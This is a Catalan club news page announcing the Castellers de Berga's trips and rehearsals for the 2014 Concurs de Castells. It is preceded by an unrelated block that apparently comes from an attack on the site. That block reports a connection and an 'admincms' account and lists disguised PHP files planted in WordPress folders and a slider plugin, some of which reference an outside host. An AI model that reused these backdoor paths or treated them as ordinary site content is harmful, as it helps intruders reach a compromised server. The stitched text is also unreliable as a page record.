Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?ajax-response https://castellersdeberga.cat/wp-admin/theme-editor-cron-cron-wp.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/update-stream-core-wp-stream-ajax-meta-private.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-wp-filesystem-ssh2-private-ajax-response-private-wp-meta-private-core-private.php https://castellersdeberga.cat/wp-content/plugins/revslider/index-stream-cron-cron-stream-stream.php https://castellersdeberga.cat/wp-content/plugins/index-ajax-cron-ajax-response-wp-ajax-response.php https://castellersdeberga.cat/wp-includes/registration-meta-private-ajax-response-ajax-response-cron-wp-core.php https://castellersdeberga.cat/wp-includes/widgets/class-wp-widget-links-ajax-response-ajax.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Camí del Concurs de Castells
 

Camí del Concurs de Castells


Camí del Concurs de CastellsEls Castellers de Berga encaren l’últim mes i mig de temporada amb reptes i actuacions importants. És per això que han preparat una sèrie d’activitats especials de cara a arribar amb la millor forma a aquest final de la seva tercera temporada.

Diumenge 28 de setembre arriba la primera jornada del Concurs de Castells. Se celebra a Torredembarra i hi participen 11 colles. Els berguedans han programat un assaig especial per al divendres 26 de setembre. A partir de 2/4 de 9 del vespre, tothom que assisteixi al Teatre de Cal Rosal rebrà l’obsequi d’una samarreta de la colla. A més a més, podrà sopar després de l’assaig i gaudir del concert dels Panxocontents.  Diumenge 28, els Castellers de Berga posen a disposició de tothom qui ho vulgui autocars per desplaçar-se fins a Torredembarra per fer pinya amb els de la camisa blava. Tot de manera gratuïta.
Diumenge 5 d’octubre, els berguedans també posaran autocars gratuïts per desplaçar-se a la Tarraco Arena Plaça. En aquesta jornada del diumenge 5, actuaran les 12 millors colles del darrer any (amb l’excepció de Minyons de Terrassa, que han renunciat sempre a participar-hi). Entre aquestes 12 colles, hi haurà els Castellers de Sabadell, padrins dels Castellers de Berga.
El Concurs de Castells se celebra en tres jornades, agrupant les colles segons el nivell: el diumenge 28 de setembre a Torredembarra i el 4 i el 5 d’octubre a Tarragona. El Concurs de Castells té lloc cada dos anys. A diferència de la majoria d’actuacions, el Concurs adopta un format de competició en què la posició de les colles en la classificació final ve determinada per la dificultat dels castells assolits. En l’edició del 2014, hi participaran 41 colles: 11 colles el diumenge 28 de setembre, 18 el dissabte 4 d’octubre i 12 el diumenge 5 d’octubre.
La recta final de la temporada berguedana seran les actuacions el 19 d’octubre a Avià, el 26 d’octubre a Sabadell i l’1 de novembre a Súria. Els assajos, cada dimarts i divendres a partir de les 8 del vespre, al Teatre de Cal Rosal.